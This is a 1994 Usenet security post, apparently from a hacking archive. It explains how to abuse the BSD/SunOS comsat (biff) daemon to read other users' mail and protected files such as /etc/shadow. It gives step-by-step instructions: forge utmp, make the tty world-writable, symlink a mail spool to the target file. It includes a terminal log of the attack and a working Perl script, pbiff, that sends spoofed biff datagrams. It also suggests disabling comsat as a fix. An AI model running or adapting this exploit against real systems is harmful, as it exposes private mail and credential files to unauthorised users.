************************************************************************** HACK: Spoof the "in.comsat" daemon to read any file System: BSD, SunOS Source: bianco@thunder.cs.odu.edu post to comp.security.unix ************************************************************************** It is entirely possible to get comsat to read the contents of pretty much any file on the system. I've tested this on SunOS, but it should work on many BSD-based Unixes. I haven't tested it on any SVR4 machines. The method is this. Let's say you want to read some other user's mail. First, change your utmp entry so that the system thinks that user is logged onto that tty instead of you. For a real unix hacker, this should be a trivial exercise. Next, 'biff y' to let the system know that this tty should accept biff requests. (You may also need to set your tty to be world writable. If so, "chmod ugo+rw `tty`".). When you've done these things, you simply spoof a biff request to the comsat daemon, and you're in business (a perl script for such spoofing is included below). Comsat reads a single datagram, of the form "user@offset" (where 'user' is a loginname and 'offset' is an integer offset into /var/spool/mail/user). It will print the first 560 bytes of the mail spool to the biff'ed terminal. By increasing the offset parameter in 560 byte increments, you can read out the entire file! I've also been successful at reading protected system files (such as /etc/shadow or /.rhosts) by this method, using a link from /var/spool/mail/user to the file I wanted to read. You simply have to find a user w/o a mail spool file. Not real hard, generally... In case my instructions weren't clear enough, here's an example of reading someone else's mailspool. My roommate was kind enough to allow me to send him some mail, then read it back out for this purpose (I've edited out some control characters from the xterm log, and indented it with the `||` characters to set it off from the rest of the message, but have otherwise left the contents intact): ||opium:/home/bianco/hack/utmp> w ||User tty login@ idle JCPU PCPU what ||bianco ttyp0 12:56pm 2 1 w ||opium:/home/bianco/hack/utmp> ls -lag dev/ttyp0 ||crw--w---- 1 bianco tty 20, 0 Jan 16 12:58 /dev/ttyp0 ||opium:/home/bianco/hack/utmp> chmod guo+rw /dev/ttyp0 ||opium:/home/bianco/hack/utmp> biff y ||opium:/home/bianco/hack/utmp> ls -lag /dev/ttyp0 ||crwxrw-rw- 1 bianco tty 20, 0 Jan 16 12:58 /dev/ttyp0 ||opium:/home/bianco/hack/utmp> ./utmp ttyp0 page ||opium:/home/bianco/hack/utmp> cp /tmp/utmp.temp /etc/utmp ||opium:/home/bianco/hack/utmp> w || 12:59pm up 8 days, 22:11, 1 user, load average: 0.09, 0.01, 0.00 ||User tty login@ idle JCPU PCPU what ||page ttyp0 12:56pm 3 1 w ||opium:/home/bianco/hack/utmp> ./pbiff localhost page 0 ||Trying to spoof biff for page@localhost (0) ||opium:/home/bianco/hack/utmp> ||New mail for page@opium has arrived: ||---- ||From: "David J. Bianco" ||Date: Sun, 16 Jan 1994 12:57:36 -0500 ||To: page@cs.odu.edu ||Subject: Mail #1 || ||This is the first in the series of mail I'm sending Dan so that I can ||post to USENET about how to read other people's mail. This is just to ||...more... ||opium:/home/bianco/hack/utmp> ./pbiff localhost page 560 ||Trying to spoof biff for page@localhost (560) ||opium:/home/bianco/hack/utmp> ||New mail for page@opium has arrived: ||---- ||The series of mail I'm sending Dan so that I can ||post to USENET about how to read other people's mail. This is just to ||show that this method will actually work. || || David || ||Received: from opium.cs.odu.edu (bianco@opium.cs.odu.edu []) by chrysanthemum-bb (8.6.4/8.6.4) with ESMTP id MAA10227 for ; Sun, 16 Jan 1994 12:49:44 -0500 ||...more... || ||opium:/home/bianco/hack/utmp> ls -lag /var/spool/mail/page ||-rw------- 1 page student 1350 Jan 16 12:49 /var/spool/mail/page ||opium:/home/bianco/hack/utmp> || Until (unless) the comsat problem is fixed by vendors, I'd recommend disabling it from your inetd.conf file. On the systems I use, at least, it seems to be an underused feature, to say the least. Of course, you could also change the permissions on your utmp, but this may have other side effects. As promised, here's the perl script "pbiff." Use it like : % pbiff - ------------------------------snip snip------------------------------- #!/usr/local/bin/perl # # Author: David J. Bianco # # Fake biff requests to (possibly remote) hosts # #define some things here... sub INTEL{0}; sub ATT{0}; require "sys/socket.ph"; $them = $ARGV[0]; $user = $ARGV[1]; $offset = $ARGV[2]; print "Trying to spoof biff for $user@$them ($offset)\n"; $sockaddr = 'S n a4 x8'; chop($hostname = `uname -n`); ($name, $aliases, $proto) = getprotobyname('udp'); ($name, $aliases, $port) = getservbyname('biff', $port); ($name, $aliases, $type, $len, $thisaddr) = gethostbyname($hostname); ($name, $aliases, $type, $len, $thataddr) = gethostbyname($them); $this = pack($sockaddr, &AF_INET, 0, $thisaddr); $that = pack($sockaddr, &AF_INET, $port, $thataddr); socket(S, &AF_INET, &SOCK_DGRAM, $proto) || die "socket: $!"; connect(S, $that) || die "connect: $!"; select(S); $| = 1; select(stdout); print S "$user@$offset\n"; # send fake biff message close(S); - ------------------------------snip snip---------------------------